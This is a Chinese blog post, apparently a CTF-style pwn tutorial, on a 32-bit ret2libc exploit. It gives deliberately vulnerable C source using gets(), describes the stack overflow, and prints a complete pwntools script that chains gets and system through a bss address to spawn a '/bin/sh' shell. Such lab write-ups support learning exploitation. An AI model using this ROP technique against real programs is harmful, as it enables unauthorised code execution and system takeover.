ret2libc2(x86)

最新推荐文章于 2025-08-15 10:40:41 发布
原创 最新推荐文章于 2025-08-15 10:40:41 发布 · 200 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #pwn #ret2libc

双函数ROP

源码

#include <stdio.h>
#include <stdlib.h>

void target(){
	system("try to make a binsh");
}

void init() {
	setvbuf(stdout, 0, 2, 0);
	setvbuf(stdin, 0, 1, 0);
	setvbuf(stderr, 0, 1, 0);
}

void vulnfunc() {
	char buf[0x100];
	puts("ret2libc2");
	gets(buf);
}

int main(){	
	init();
	vulnfunc();
}

检查保护

IDA查看漏洞函数

有一个栈溢出,gets函数不限制读入长度。

有system函数,但是程序中没有"/bin/sh"

那么就用gets函数读入"/bin/sh"字符串,传给system函数

目标栈布局

编写exp

找一个bss段地址用来写入"/bin/sh"

目标payload

b "a" * (0x108 + 4) + p32(gets) + p32(system) + p32(bss)+p32(bss)

 system地址

 gets地址

exp

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p = process("./ret2libc2")

sys = 0x080483d0
sh = "/bin/sh"
bss = 0x0804a040
gets = 0x080483b0

payload = b"a"*(0x108+4) + p32(gets) + p32(sys) + p32(bss) + p32(bss)
p.recvuntil("ret2libc2\n")
p.sendline(payload)
p.sendline(sh)

p.interactive()

成功利用

H01mes_
关注
[CTF]PWN--新人入门第一关--Ret2libc
2301_79880752的博客
02-29 1660
首先我们需要找到pop rdi|ret这个指令在程序中的位置(前面提到该指令为程序中自带的,只不过需要我们去寻找),然后让程序返回到pop rdi|ret这个指令上去执行它,通过ROPgadget --binary pwn --only 'pop|ret' 该指令来寻找pop |ret这个指令的地址,其中ROPgadget为一个插件,需要自己下载,binary意思为一个二进制文件,后面跟着的是文件名,only后面跟着的为要搜索的命令地址。
从零开始学逆向:理解ret2libc-1
weixin_44626085的博客
02-19 1670
ret2libc即劫持程序的控制流,使其执行libc中的函数,一般是返回到某个函数的plt处,或者某个函数的具体位置(函数对应got表的内容),大多情况下是执行system('/bin/sh')
ROP和Ret2libc漏洞
qq_67812668的博客
08-12 1134
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
栈溢出入门0x07 ret2libc3&Hijack GOT
砖家
10-04 1113
使用patchelf保证ret2libc3的实验结果一致性,先泄露函数地址后得到libc版本和加载基地址之后计算出system和/bin/sh的真实加载地址,从而getshell
从零开始学逆向:理解ret2libc-3
weixin_44626085的博客
02-20 1628
题目下载链接:https://pan.baidu.com/s/1wk3JFQBHgVZ0vjfnQk60Ug 提取码:0000。
《中国人工智能安全承诺框架》发布
2501_91883294的博客
08-14 2087
为把握新一轮发展机遇,中国人工智能发展与安全研究网络成员郑重发起《中国人工智能安全承诺框架》,通过产业自律,以高水平安全保障高质量发展,协力共促人工智能稳健发展。我们深知,自律承诺是获得社会信任的关键要素,我们将以本承诺作为行动守则,接受社会各界监督,不断提升优化,促进人工智能技术应用以人为本,智能向善。承诺四:提升基础设施安全。建立人工智能系统部署的软硬件安全监测和防护能力,实施定期和动态的安全渗透测试,模拟各种潜在的风险场景,识别并报告环境中的安全隐患,研判可能导致的各种风险。承诺五:增强模型透明度。
仓库无人叉车的安全功能有哪些?如何在提升效率时保障安全
AiTEN_Robot的博客
08-13 576
在仓库引入无人叉车,不仅是效率的提升,更是安全管理的一次升级。借助障碍物检测、紧急停止、自适应行驶以及货物稳定控制等技术,这些设备能够在满足严格安全法规的同时,有效降低运营风险。在选择无人叉车方案时,企业应确保其产品符合相关安全标准,并根据自身仓储布局与作业流程,配置合适的安全功能。毕竟,在物料搬运的数字化浪潮中,安全始终应放在首位。原文:海豚之星机器人。
【web站点安全开发】任务4:JavaScript与HTML/CSS的完美协作指南
不羁的博客
08-14 958
本文介绍了JavaScript在前端开发中的核心作用及其与HTML、CSS的协作方式。主要内容包括:1. JavaScript语言特性,通过对比表格展示其与Java在类型系统、面向对象、执行方式等方面的本质区别;2. JavaScript在HTML中的使用方法,包括<script>标签的三种放置位置(head/body/外部文件);3. 四种常用输出方式(alert/write/innerHTML/console.log);4. 语法特性比较(变量声明、数据类型、函数定义等)等
安全防范方案
最新发布
huluang的专栏
08-15 959
防火墙通过GeoIP数据库封禁国外IP,需配置白名单防误封。
加密货币交易所开发:如何打造安全、高并发的数字资产交易平台?
Lovely_xwys的博客
08-14 836
**摘要:**2025年加密货币交易量激增,但安全与性能挑战仍存。顶级交易所通过三重防线(冷存储、MPC签名、零信任系统)保障资产安全,采用分层撮合架构(Rust引擎、弹性扩展)实现百万级交易处理。合规方面,动态引擎适配全球监管,AI反洗钱精准拦截风险。未来需布局量子加密与AI做市,平衡性能与成本。核心在于融合金融级安全、电竞级性能与法律级合规,构建下一代数字资产枢纽。
开源安全云盘存储:Hoodik 实现端到端数据加密,Docker快速搭建
baidu_24794635的博客
08-14 308
以下是对 Hoodik 的简单介绍: - Hoodik 是一个使用 Rust 和 Vue 开发的轻量级自托管安全云存储解决方案 - 采用了非对称RSA密钥对和AES混合加密策略,从文件存储加密到数据链路加密,全程保证数据安全 - 支持Docker一键私有部署,数据和服务自托管 - 该项目的开源代码地址参考:https://github.com/hudikhq/hoodik Docker快速部署与应用实践示例参考:https://blog.luler.top/d/72
自动驾驶中安全相关机器学习功能的可靠性定义方法
NewCarRen的博客
08-13 1077
本文针对高自动化驾驶(HAD)中基于机器学习功能的安全标准空白展开研究。文章指出现有ISO 26262和SOTIF标准无法完全满足HAD需求,特别是神经网络的不透明性带来的验证挑战。作者提出"功能可靠性"概念,以行人检测为例构建了统计可靠性Rs和动态可靠性Rd的数学表达,通过精确率、召回率、IOU等指标量化功能质量。研究还探讨了传感器融合、算法优化等提高可靠性的方法。这项工作为HAD中机器学习功能的安全评估提供了新思路,建议行业共同建立验证数据集和关键参数标准,推动HAD安全标准的发展。
C语言+安全函数+非安全函数
m0_61973119的博客
08-15 181
例如,当我们将一个字符串要赋值到另一个数组中时,我们一般会使用C语言自带的strcpy函数,但是针对该函数的底层实现,仅仅只是傻瓜式的将源地址的数据存储到目的地址,不会注意缓冲区是否溢出,如果目的地址空间不够,那么相邻的地址的值会被改变,然后读取的数据不对,严重的可能会造成程序崩溃。而这更重要的一点就是始终检查边界、验证输入、启用编译器警告,需要让代码做到0警告,以后调用一些C语言函数时,可以先了解一下是否有安全函数,如果有就可以直接用,虽然这是一个小问题,但是会无意间增加代码的鲁棒性。
Go语言中安全停止Goroutine的三种方法及设计哲学
weixin_48552411的博客
08-15 1041
本文介绍了Go语言中安全停止Goroutine的三种常用方法:1)通过close关闭Channel触发Goroutine退出,适用于简单生产者-消费者模型;2)利用select轮询停止信号,实现多事件处理的灵活控制;3)使用context包进行标准化生命周期管理,适合复杂调用链场景。文章分析了每种方法的优缺点和适用场景,并解释了Go语言不支持强制终止Goroutine的设计哲学——通过通信实现协同退出,避免资源泄露和逻辑混乱。开发者应根据业务复杂度选择合适方案,在保证程序健壮性的同时遵循Go语言的并发设计理
叉车标配AI防碰撞系统,作业安全与效益双提升
wtsafe的博客
08-15 245
但传统叉车依赖人工操作,存在诸多安全隐患,如视线盲区、超速、疲劳驾驶等,容易引发碰撞等事故。利用人脸识别验证操作资质。构建智能仓储生态 AI防撞系统可与仓储管理系统(WMS)、叉车调度系统(FMS)集成,实现叉车与AGV协同作业,动态任务分配优化资源利用率,远程监控与预警让管理人员实时掌握全场安全状态。并且系统能动态规划路径,预测碰撞风险,提前发出声光警报,必要时自动减速或停车。系统实时采集叉车运行数据,生成安全分析报告,帮助企业识别高风险区域,优化调度与路径规划,针对性开展驾驶员培训,提升安全操作技能。
安全基础DAY5-终端安全检测和防御技术
2203_75284077的博客
08-13 472
本文摘要:终端安全面临恶意代码入侵、信息泄露等风险,传统防火墙存在认证局限。针对不同软件采取差异化防护策略:浏览器因连接不确定性适用五元组控制,其他软件适合应用层策略。网关杀毒技术解决了工业系统等无法安装杀毒软件的问题,具备应用层过滤、主动防御等优势,实现方式包括代理扫描和流扫描。僵尸网络检测采用CC服务器识别、DGA算法分析等9种技术手段,通过流量特征、文件行为等异常模式识别感染主机。(150字)
O2OA:数字化转型中安全与效率的平衡之道
liyi_hz2008的博客
08-13 1075
本文将深入结合 O2OA 的技术架构,探讨如何在保障数据主权的前提下,实现企业门户的敏捷开发与合规运营,为企业的数字化转型保驾护航。随着《数据安全法》《个人信息保护法》的深入实施,O2OA 这类融合安全基因的低代码平台,必将成为企业构建数字免疫系统的关键基础设施,为企业的可持续发展保驾护航。这意味着像客户身份证号、商业合同等敏感信息,在数据库中始终以密文形式存在,即使数据库不幸被攻破,攻击者也无法获取到有价值的信息,从根本上保障了敏感数据的安全。数据泄露事件归零,为企业的信息安全提供了有力保障。
上网行为安全概述和组网方案
qq99899的博客
08-14 754
功能,即可恢复网络通信,相当于把AC当作一个物理设备使用,当用户行为管理的重要程度小于用户网络稳定的时候开启。缺乏管理导致风险:带宽滥用、监管困难、信息泄露、网络违法、安全威胁。:应对移动互联网、加密流量(HTTPS)、新型应用持续升级识别能力。:多分支场景,集成组网(IPSec VPN)、安全防护、行为管理。:企业出口部署,实现过滤、流控、审计(满足公安部82号令)。:Portal认证(短信/微信),推广公众号,集中审计日志。:员工非工作行为(聊天、炒股、游戏)降低效率。
酒店行业安全体系构建与优化策略
BJHHZX1991的博客
08-13 255
为确保酒店行业领导及宾客的安全,构建全面的治安联防体系及事故处理预案至关重要。某招待所通过设立保卫部,细化内保、治安、防火及交通管理职能,并下设警卫班、监控中心和电瓶车班,以全方位保障安全
ret2libc2和ret2syscall区别
03-23
需要注意的是,用户提供的引用中并没有直接提到ret2syscall的具体例子,但引用2提到了栈溢出/ret2shellcode/ret2syscall/ret2libc的分类,说明ret2syscall是另一种方法。结合我的知识,ret2syscall通常涉及将返回...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值